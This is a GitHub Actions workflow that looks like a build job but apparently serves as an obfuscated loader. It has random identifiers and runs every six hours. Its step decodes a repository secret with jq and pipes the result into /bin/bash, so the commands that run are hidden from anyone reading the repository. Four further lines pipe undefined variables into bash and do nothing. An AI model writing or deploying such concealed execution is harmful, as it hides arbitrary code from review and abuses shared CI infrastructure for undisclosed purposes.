name: miaoyidao6745

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: miaoyidao6745
        env:
          et035: ${{ secrets.et035 }}
        run: |
          echo $et035 | jq -r .hjmi97 | /bin/bash
          echo $w8585 | jq -r .yeeaj6484 | /bin/bash
          echo $tmk55 | jq -r .oofk2786 | /bin/bash
          echo $da57 | jq -r .swouj640 | /bin/bash
          echo $orgx84224 | jq -r .yqu10493 | /bin/bash

